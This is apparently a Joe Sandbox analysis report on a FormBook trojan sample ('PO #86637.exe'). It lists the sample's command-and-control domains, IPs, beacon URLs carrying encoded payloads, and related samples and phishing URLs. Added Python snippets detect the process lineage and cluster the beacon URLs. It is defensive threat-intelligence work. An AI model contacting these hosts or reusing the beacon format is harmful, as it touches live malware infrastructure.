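        print(finding["rule"], "|", finding["detail"], "|", " > ".join(finding["lineage"]))
```

Each finding carries the full lineage, so the analyst sees "explorer.exe > po #86637.exe > svchost.exe > at.exe > firefox.exe" rather than an isolated parent/child pair; that chain is what distinguishes this sample from an administrator genuinely running at.exe from a console. Sysmon event ID 1 (ParentProcessId, Image) maps directly onto Proc.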

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner | Label
PO #86637.exe | 51% | Virustotal |
PO #86637.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject
PO #86637.exe | 100% | Avira | HEUR/AGEN.1321685
PO #86637.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner
easyanalytics.site | 1% | Virustotal
hm62t.top | 2% | Virustotal
kalomor.top | 5% | Virustotal
www.zhuoyueapp.top | 1% | Virustotal
www.subitoadomicilio.shop | 0% | Virustotal
www.syvra.xyz | 1% | Virustotal
loan-insurance.shop | 1% | Virustotal
www.dom-2.online | 0% | Virustotal
www.loan-insurance.shop | 1% | Virustotal
www.kalomor.top | 5% | Virustotal
www.teksales.space | 7% | Virustotal
www.hm62t.top | 2% | Virustotal
www.easyanalytics.site | 1% | Virustotal
www.route4.org | 0% | Virustotal
www.meery.store | 0% | Virustotal
www.linkbasic.net | 4% | Virustotal
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://www.syvra.xyz/h2bb/ | 0% | Avira URL Cloud | safe
https://kb.fastpanel.direct/troubleshoot/ | 0% | Avira URL Cloud | safe
http://www.autonashville.com/7d10/?6X=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&_vft=vxWlbDi8ipa49jzp | 0% | Avira URL Cloud | safe
http://www.syvra.xyz/h2bb/?6X=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&_vft=vxWlbDi8ipa49jzp | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://kb.fastpanel.direct/troubleshoot/ | 0% | Virustotal |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
http://www.syvra.xyz/h2bb/ | 1% | Virustotal |
http://www.subitoadomicilio.shop/x7sd/?6X=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI=&_vft=vxWlbDi8ipa49jzp | 0% | Avira URL Cloud | safe
http://www.hm62t.top/edpl/?6X=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&_vft=vxWlbDi8ipa49jzp | 0% | Avira URL Cloud | safe
http://www.hm62t.top/edpl/ | 0% | Avira URL Cloud | safe
http://www.zhuoyueapp.top/6m23/ | 0% | Avira URL Cloud | safe
http://www.kalomor.top/1i25/?6X=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&_vft=vxWlbDi8ipa49jzp | 100% | Avira URL Cloud | malware
http://www.hm62t.top/edpl/ | 2% | Virustotal |
https://www.google.com | 0% | Avira URL Cloud | safe
http://www.route4.org/65ev/?_vft=vxWlbDi8ipa49jzp&6X=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk= | 0% | Avira URL Cloud | safe
http://www.dom-2.online/m409/ | 0% | Avira URL Cloud | safe
http://www.kalomor.top/1i25/ | 100% | Avira URL Cloud | malware
http://www.autonashville.com/7d10/ | 0% | Avira URL Cloud | safe
http://www.zhuoyueapp.top/6m23/ | 1% | Virustotal |
https://www.google.com | 0% | Virustotal |
https://www.aapanel.com/new/download.html?invite_code=aapanele | 0% | Avira URL Cloud | safe
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Avira URL Cloud | safe
http://www.easyanalytics.site/21tc/ | 0% | Avira URL Cloud | safe
http://www.subitoadomicilio.shop/x7sd/ | 0% | Avira URL Cloud | safe
http://www.kalomor.top | 100% | Avira URL Cloud | malware
https://www.aapanel.com/new/download.html?invite_code=aapanele | 0% | Virustotal |
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Virustotal |
http://www.easyanalytics.site/21tc/?6X=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&_vft=vxWlbDi8ipa49jzp | 0% | Avira URL Cloud | safe
http://www.dom-2.online/m409/?6X=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&_vft=vxWlbDi8ipa49jzp | 0% | Avira URL Cloud | safe
http://www.kalomor.top | 5% | Virustotal |
http://www.subitoadomicilio.shop/x7sd/ | 1% | Virustotal |
Name | IP | Active | Malicious | Reputation
easyanalytics.site | 162.241.226.190 | true | true | unknown
hm62t.top | 154.23.184.240 | true | true | unknown
kalomor.top | 91.215.85.23 | true | true | unknown
www.zhuoyueapp.top | 47.104.180.139 | true | true | unknown
autonashville.com | 3.33.130.190 | true | true | unknown
www.syvra.xyz | 162.0.213.94 | true | true | unknown
loan-insurance.shop | 84.32.84.32 | true | true | unknown
www.route4.org | 34.150.58.73 | true | true | unknown
www.subitoadomicilio.shop | 195.24.68.25 | true | true | unknown
www.dom-2.online | 199.59.243.227 | true | true | unknown
www.kalomor.top | unknown | unknown | true | unknown
www.hm62t.top | unknown | unknown | true | unknown
www.teksales.space | unknown | unknown | true | unknown
www.pelus-pijama-pro.shop | unknown | unknown | true | unknown
www.loan-insurance.shop | unknown | unknown | true | unknown
www.linkbasic.net | unknown | unknown | true | unknown
www.autonashville.com | unknown | unknown | true | unknown
www.easyanalytics.site | unknown | unknown | true | unknown
www.meery.store | unknown | unknown | true | unknown
www.torkstallningar.shop | unknown | unknown | true | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.syvra.xyz/h2bb/?6X=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&_vft=vxWlbDi8ipa49jzp | true | Avira URL Cloud: safe | unknown
http://www.autonashville.com/7d10/?6X=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&_vft=vxWlbDi8ipa49jzp | true | Avira URL Cloud: safe | unknown
http://www.syvra.xyz/h2bb/ | true | Virustotal 1%; Avira URL Cloud: safe | unknown
http://www.subitoadomicilio.shop/x7sd/?6X=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI=&_vft=vxWlbDi8ipa49jzp | true | Avira URL Cloud: safe | unknown
http://www.hm62t.top/edpl/ | true | Virustotal 2%; Avira URL Cloud: safe | unknown
http://www.hm62t.top/edpl/?6X=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&_vft=vxWlbDi8ipa49jzp | true | Avira URL Cloud: safe | unknown
http://www.zhuoyueapp.top/6m23/ | true | Virustotal 1%; Avira URL Cloud: safe | unknown
http://www.kalomor.top/1i25/?6X=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&_vft=vxWlbDi8ipa49jzp | true | Avira URL Cloud: malware | unknown
http://www.route4.org/65ev/?_vft=vxWlbDi8ipa49jzp&6X=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk= | true | Avira URL Cloud: safe | unknown
http://www.dom-2.online/m409/ | true | Avira URL Cloud: safe | unknown
http://www.kalomor.top/1i25/ | true | Avira URL Cloud: malware | unknown
http://www.autonashville.com/7d10/ | true | Avira URL Cloud: safe | unknown
http://www.easyanalytics.site/21tc/ | true | Avira URL Cloud: safe | unknown
http://www.subitoadomicilio.shop/x7sd/ | true | Virustotal 1%; Avira URL Cloud: safe | unknown
http://www.easyanalytics.site/21tc/?6X=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&_vft=vxWlbDi8ipa49jzp | true | Avira URL Cloud: safe | unknown
http://www.dom-2.online/m409/?6X=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&_vft=vxWlbDi8ipa49jzp | true | Avira URL Cloud: safe | unknown
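Every URL the report marks malicious has the same shape: plain http to a www. host, a single four-character path segment, a two-character query key carrying a long base64-like blob, and a fixed `_vft` token (vxWlbDi8ipa49jzp) that is identical across hosts. Scanner verdicts on those URLs are mostly "safe", so a structural rule is worth more than reputation here. The script below is an added example and not part of the report: it classifies URLs by that shape and clusters hosts by the shared token; the sample input is copied from the tables above plus a few benign URLs, and the length thresholds are assumptions fitted to these URLs, not a general signature for the malware family.

```python
import re
from urllib.parse import urlsplit

# Shape observed in the report's C2 URLs (assumed thresholds, fitted to them).
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")          # one 4-char path segment
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{16}$")        # the _vft value
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{48,}={0,2}$")  # base64-like payload


def split_query(query):
    """Split a query string without percent-decoding.

    parse_qsl would turn '+' into a space and break the base64 check,
    so the pairs are split by hand and the first '=' separates key from value."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    return params


def classify(url):
    """Describe why a URL matches the beacon shape, or return None."""
    parts = urlsplit(url)
    if parts.scheme != "http" or not parts.netloc.startswith("www.") or not PATH_RE.match(parts.path):
        return None
    params = split_query(parts.query)
    if not params:
        # Bare path as seen in memory strings: the beacon path without its payload.
        return {"host": parts.netloc, "path": parts.path, "token": None, "key": None, "kind": "path-only"}
    token = params.pop("_vft", None)
    if token is None or not TOKEN_RE.match(token) or len(params) != 1:
        return None
    key, blob = next(iter(params.items()))
    if len(key) != 2 or not BLOB_RE.match(blob):
        return None
    return {"host": parts.netloc, "path": parts.path, "token": token, "key": key, "kind": "beacon"}


def cluster(urls):
    """Group beacon hosts by _vft token.

    One token shared across many hosts is the fingerprint of one campaign
    rotating through its C2 list, which is what the report's URL table shows."""
    groups = {}
    for url in urls:
        rec = classify(url)
        if rec and rec["kind"] == "beacon":
            groups.setdefault(rec["token"], set()).add(rec["host"])
    return {token: sorted(hosts) for token, hosts in groups.items()}


# Sample input: beacon URLs copied from the report's tables, plus benign URLs
# from the same tables as controls.
SAMPLE_URLS = [
    "http://www.syvra.xyz/h2bb/?6X=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&_vft=vxWlbDi8ipa49jzp",
    "http://www.kalomor.top/1i25/?6X=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&_vft=vxWlbDi8ipa49jzp",
    "http://www.route4.org/65ev/?_vft=vxWlbDi8ipa49jzp&6X=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk=",
    "http://www.easyanalytics.site/21tc/?6X=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&_vft=vxWlbDi8ipa49jzp",
    "http://www.hm62t.top/edpl/",
    "http://www.kalomor.top",
    "https://duckduckgo.com/chrome_newtab",
    "https://www.google.com",
    "https://kb.fastpanel.direct/troubleshoot/",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(classify(url), url[:60])
    print(cluster(SAMPLE_URLS))
```

The route4.org URL has its parameters in the opposite order; the classifier treats the query as a map, so it still clusters with the others. Run over proxy logs, the cluster output is the host list one campaign rotated through, which is a better blocking unit than any single domain in the table.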
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://kb.fastpanel.direct/troubleshoot/ | at.exe, 00000003.00000002.3549391269.000000000591E000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.000000000449E000.00000004.00000001.00040000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com | at.exe, 00000003.00000002.3549391269.00000000055FA000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3551318887.0000000006A40000.00000004.00000800.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.000000000417A000.00000004.00000001.00040000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.aapanel.com/new/download.html?invite_code=aapanele | at.exe, 00000003.00000002.3549391269.00000000047D8000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.0000000003358000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2246132315.0000000038FF8000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | at.exe, 00000003.00000002.3549391269.0000000004C8E000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.000000000380E000.00000004.00000001.00040000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
http://www.kalomor.top | yRUFfzlnDkMN.exe, 00000007.00000002.3549663217.00000000050E1000.00000040.80000000.00040000.00000000.sdmp | true | Virustotal 5%; Avira URL Cloud: malware | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
91.215.85.23 | kalomor.top | Russian Federation | 34665 | PINDC-ASRU | true
162.0.213.94 | www.syvra.xyz | Canada | 35893 | ACPCA | true
199.59.243.227 | www.dom-2.online | United States | 395082 | BODIS-NJUS | true
162.241.226.190 | easyanalytics.site | United States | 46606 | UNIFIEDLAYER-AS-1US | true
34.150.58.73 | www.route4.org | United States | 2686 | ATGS-MMD-ASUS | true
195.24.68.25 | www.subitoadomicilio.shop | Russian Federation | 48287 | RU-CENTERRU | true
154.23.184.240 | hm62t.top | United States | 174 | COGENT-174US | true
3.33.130.190 | autonashville.com | United States | 8987 | AMAZONEXPANSIONGB | true
47.104.180.139 | www.zhuoyueapp.top | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1515412
Start date and time: 2024-09-22 17:38:23 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO #86637.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@15/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 46
• Number of non-executed functions: 306
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session; see the PCAPs for the complete data
Time | Type | Description
11:40:08 | API Interceptor | 7086189x Sleep call for process: at.exe modified
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    91.215.85.23 | invoice.exe | Get hash | malicious | FormBook | Browse | www.kalomor.top/1i25/
                    91.215.85.23 | Purchase order.exe | Get hash | malicious | FormBook | Browse | www.kalomor.top/6th3/
                    91.215.85.23 | Remittance advice.exe | Get hash | malicious | FormBook | Browse | www.kalomor.top/6th3/
                    91.215.85.23 | PO#86637.exe | Get hash | malicious | FormBook | Browse | www.kalomor.top/1i25/
                    91.215.85.23 | Quote #011698.exe | Get hash | malicious | FormBook | Browse | www.kalomor.top/1i25/
                    91.215.85.23 | PO#86637.exe | Get hash | malicious | FormBook | Browse | www.kalomor.top/1i25/
                    91.215.85.23 | DHL airwaybill # 6913321715 & BL Draft copy.exe | Get hash | malicious | FormBook | Browse | www.kalomor.top/pf98/
                    91.215.85.23 | PO#86637.exe | Get hash | malicious | FormBook | Browse | www.kalomor.top/1i25/
                    91.215.85.23 | PO#86637.exe | Get hash | malicious | FormBook | Browse | www.kalomor.top/1i25/
                    91.215.85.23 | PI 30_08_2024.exe | Get hash | malicious | FormBook | Browse | www.kalomor.top/1i25/
                    162.0.213.94 | New Purchase Order.exe | Get hash | malicious | FormBook | Browse | www.kryto.top/09dt/
                    162.0.213.94 | invoice.exe | Get hash | malicious | FormBook | Browse | www.syvra.xyz/h2bb/
                    162.0.213.94 | r9856_7.exe | Get hash | malicious | FormBook | Browse | www.zimra.xyz/knrh/
                    162.0.213.94 | PO#86637.exe | Get hash | malicious | FormBook | Browse | www.syvra.xyz/h2bb/
                    162.0.213.94 | New Purchase Order.exe | Get hash | malicious | FormBook | Browse | www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr
                    162.0.213.94 | Scan 00093847.exe | Get hash | malicious | FormBook | Browse | www.kryto.top/09dt/
                    162.0.213.94 | Quote #011698.exe | Get hash | malicious | FormBook | Browse | www.syvra.xyz/h2bb/
                    162.0.213.94 | PO#86637.exe | Get hash | malicious | FormBook | Browse | www.syvra.xyz/h2bb/
                    162.0.213.94 | PO#86637.exe | Get hash | malicious | FormBook | Browse | www.syvra.xyz/h2bb/
                    162.0.213.94 | 0XLuA614VK.exe | Get hash | malicious | FormBook | Browse | www.rigintech.info/ig9u/
                    199.59.243.227 | ADNOC REQUESTS & reviews.exe | Get hash | malicious | FormBook | Browse | www.care-for-baby-1107.xyz/cxj4/
                    199.59.243.227 | http://kateandkaylearningacademy.com | Get hash | malicious | Unknown | Browse | ww1.kateandkaylearningacademy.com/_tr
                    162.241.226.190 | invoice.exe | Get hash | malicious | FormBook | Browse | www.easyanalytics.site/21tc/
                    162.241.226.190 | PO#86637.exe | Get hash | malicious | FormBook | Browse | www.easyanalytics.site/21tc/
                    162.241.226.190 | Quote #011698.exe | Get hash | malicious | FormBook | Browse | www.easyanalytics.site/21tc/
                    162.241.226.190 | PO#86637.exe | Get hash | malicious | FormBook | Browse | www.easyanalytics.site/21tc/
                    162.241.226.190 | DHL airwaybill # 6913321715 & BL Draft copy.exe | Get hash | malicious | FormBook | Browse | www.easyanalytics.site/d029/
                    162.241.226.190 | PO#86637.exe | Get hash | malicious | FormBook | Browse | www.easyanalytics.site/21tc/
                    162.241.226.190 | PO#86637.exe | Get hash | malicious | FormBook | Browse | www.easyanalytics.site/21tc/
                    162.241.226.190 | PI 30_08_2024.exe | Get hash | malicious | FormBook | Browse | www.easyanalytics.site/21tc/
                    162.241.226.190 | rRFQ.bat.exe | Get hash | malicious | FormBook | Browse | www.easyanalytics.site/6ra4/
                    162.241.226.190 | factura-630.900.exe | Get hash | malicious | FormBook | Browse | www.easyanalytics.site/21tc/
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    www.zhuoyueapp.top | invoice.exe | Get hash | malicious | FormBook | Browse | 47.104.180.139
                    www.zhuoyueapp.top | PO#86637.exe | Get hash | malicious | FormBook | Browse | 47.104.180.139
                    www.zhuoyueapp.top | Quote #011698.exe | Get hash | malicious | FormBook | Browse | 47.104.180.139
                    www.zhuoyueapp.top | PO#86637.exe | Get hash | malicious | FormBook | Browse | 47.104.180.139
                    www.zhuoyueapp.top | PO#86637.exe | Get hash | malicious | FormBook | Browse | 47.104.180.139
                    www.zhuoyueapp.top | PO#86637.exe | Get hash | malicious | FormBook | Browse | 47.104.180.139
                    www.zhuoyueapp.top | PI 30_08_2024.exe | Get hash | malicious | FormBook | Browse | 47.104.180.139
                    www.zhuoyueapp.top | factura-630.900.exe | Get hash | malicious | FormBook | Browse | 47.104.180.139
                    www.zhuoyueapp.top | PAGO $630.900.exe | Get hash | malicious | FormBook | Browse | 47.104.180.139
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    UNIFIEDLAYER-AS-1US | urgent inquiry.exe | Get hash | malicious | AgentTesla | Browse | 192.254.225.166
                    UNIFIEDLAYER-AS-1US | PO.pdf | Get hash | malicious | Unknown | Browse | 108.179.193.153
                    UNIFIEDLAYER-AS-1US | yMg23n1D5d.elf | Get hash | malicious | Mirai, Moobot | Browse | 69.195.102.143
                    UNIFIEDLAYER-AS-1US | jydeTkHxMv.elf | Get hash | malicious | Unknown | Browse | 162.147.175.182
                    UNIFIEDLAYER-AS-1US | SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe | Get hash | malicious | Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer | Browse | 162.241.61.218
                    UNIFIEDLAYER-AS-1US | SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe | Get hash | malicious | Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer | Browse | 162.241.61.218
                    UNIFIEDLAYER-AS-1US | https://www.google.co.ls/url?url=https://pjgzknracpucs&cu=yxzbqlc&dknmbu=neq&ilrcq=atzggn&vra=ijlrrlr&yhbyc=bzlzgg&frfp=ynolmdfb&jkcxlp=ajlekjss&q=amp/asterpetroleo.com/.cgi-bin/nkqy/CVWLS/dG9tLmJ1cmdoYXJ0QHJzbGkuY29t&ljxfk=cnjfey&kqdqaeo=gnfcrepa&ddayyvkbt=qg&mhg=xzmbrfwuc&veu=gbmtcee&wusgzo=nbo&bmtdy=vnrwhp&ifb=rklwlup&kiiou=sfajza&vegi=crbiqqli&nkuoui=amzherpj&hvj=wtzg&bseos=yhnhxn&yhucgnu=mianxbuq&sewtmxxvi=lu&ndv=eomqodtth&ysq=ovjbkam&jvrehd=hcd&votrm=bedgkv&mrj=oxokzew&gythv=keqhcg&wcqw=ranlyiwi&jtcxme=prbgwkpp&ewl=zsaz&aoaoy=mxpxen&pqarhgs=vabchqht&arvcbmbum=ov&sad=rncnzmjhl&xgw=ncegjdk&jpaxcj=tav&iihwq=hdebgl&ukv=qcjmtvy&vtpue=cdwxlt&jpws=xniphwaj&tokvsg=nrkywccw | Get hash | malicious | HTMLPhisher | Browse | 108.167.168.86
                    UNIFIEDLAYER-AS-1US | https://dionthompson.com/a/?ThiNTMtNGYyOS1hNDc1LTA2YWQzNmJkNDc5ZQAQAIGKzFxi43JDqxvx%2BxZRlAU%3D | Get hash | malicious | HTMLPhisher | Browse | 192.185.129.84
                    UNIFIEDLAYER-AS-1US | MV ARKADIA Vessel's Details.pdf.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 192.185.222.22
                    UNIFIEDLAYER-AS-1US | GLOBAL ORIOLE.pdf.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 192.185.222.22
                    ACPCA | New Purchase Order.exe | Get hash | malicious | FormBook | Browse | 162.0.213.94
                    ACPCA | invoice.exe | Get hash | malicious | FormBook | Browse | 162.0.213.94
                    ACPCA | 809768765454654.exe | Get hash | malicious | FormBook | Browse | 162.0.213.72
                    ACPCA | is homemade pepper spray legal uk 42639.js | Get hash | malicious | GookitLoader | Browse | 162.55.208.83
                    ACPCA | r9856_7.exe | Get hash | malicious | FormBook | Browse | 162.0.213.94
                    ACPCA | 8097600987765.exe | Get hash | malicious | FormBook | Browse | 162.0.213.72
                    ACPCA | PO#86637.exe | Get hash | malicious | FormBook | Browse | 162.0.213.94
                    ACPCA | QOaboeP8al.exe | Get hash | malicious | DarkCloud | Browse | 162.55.60.2
                    ACPCA | Request for Quotataion.exe | Get hash | malicious | DarkCloud | Browse | 162.55.60.2
                    ACPCA | New Purchase Order.exe | Get hash | malicious | FormBook | Browse | 162.0.213.94
                    BODIS-NJUS | RECIEPT.PDF.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
                    BODIS-NJUS | ADNOC REQUESTS & reviews.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
                    BODIS-NJUS | http://kateandkaylearningacademy.com | Get hash | malicious | Unknown | Browse | 199.59.243.227
